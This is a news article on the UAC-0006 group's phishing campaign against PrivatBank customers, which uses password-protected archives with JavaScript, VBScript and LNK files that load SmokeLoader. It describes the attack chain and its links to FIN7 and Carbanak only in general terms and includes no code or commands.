The notorious financially motivated threat group dubbed UAC-0006 has been conducting an ongoing phishing campaign targeting PrivatBank customers.
This targeted organisation is one of Ukraine’s largest state-owned financial institutions. Reports revealed that the current cybercriminal activity uses password-protected packages containing malicious JavaScript, VBScript, or LNK files to avoid detection.
Since November last year, the hacking group has been delivering payment-themed phishing baits. These emails commonly include malicious attachments disguised as bills, JavaScript, and VBScript files to run PowerShell commands and the SmokeLoader malware for C2 communication.
Researchers explained that these strategies make it easier for the threat actors to acquire illegal access, execute payloads, and maintain control over compromised systems. The cyberattack starts with a phishing email with a password-protected ZIP or RAR file.
Once a target opens the attachment, the extracted JavaScript or VBScript file starts a series of processes that inject malicious code into legal Windows programs.
The phishing attack uses LNK files to deceive PrivatBank clients.
The UAC-0006 threat group has transitioned into using LNK files as a new attack vector for its latest phishing campaign against PrivatBank customers. This tactic is similar to the operation used by the Russian advanced persistent threat (APT) organisation FIN7.
These changes indicate a potential operational overlap with EmpireMonkey and Carbanak, which are notorious for financial cybercrime. The group employs PowerShell, process injection, and non-standard C2 communication protocols consistent with its previous TTPs.
Phishing tactics involve various risks, such as data compromise, which can lead to using stolen passwords and financial information for theft or sale on the dark web. Furthermore, it allows threat actors to harvest credentials by allowing unauthorised access to bank and corporate accounts.
On the other hand, PrivatBank and other companies impersonated in phishing emails may suffer reputational harm since impersonating financial service providers increases supply chain risks.
UAC-0006’s constant evolution shows the increasing sophistication of financially motivated cybercrime organisations. Therefore, companies should have more proactive protection techniques and user knowledge to counteract such threats, especially in the banking industry.
